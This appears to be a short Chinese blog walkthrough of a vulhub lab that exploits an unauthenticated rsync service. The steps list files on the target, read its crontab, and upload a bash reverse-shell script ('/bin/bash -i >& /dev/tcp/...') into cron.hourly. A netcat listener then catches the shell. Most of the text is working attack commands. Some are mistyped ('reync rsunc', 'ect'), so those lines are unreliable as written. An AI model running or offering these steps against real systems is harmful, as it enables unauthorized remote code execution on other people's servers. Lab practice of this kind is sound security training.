Rsync反彈shell
阿新 • • 發佈:2018-12-22
進入:vulhub-master/rsunc/common
開啟:sudo docker-compose up
2、埠掃描
3、使用rsync協議連線目標主機
rsync rsync://10.10.10.131/src/
4、檢視crontab配置檔案
reync rsunc://10.10.10.131/src/etc/crontab
5、下載crontab配置檔案,檢視配置,每小時的17分執行命令/etc/crontab,每個人都不一樣,自行檢視,我是17
reync rsunc://10.10.10.131/src/etc/crontab ~/crontab.txt
6、建立shell檔案,ip一定要是攻擊的哦,4444是為了與其他埠衝突,可以隨意
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.10.128/4444 0>&1
7、授權
chmod 777 shell
8、上傳,根據自己虛擬的ip
rsync -av shell rsync://10.10.10.131/src/ect/cron.hourly
9、監聽,靜靜等待17分的到來
nc -nvv -lp 4444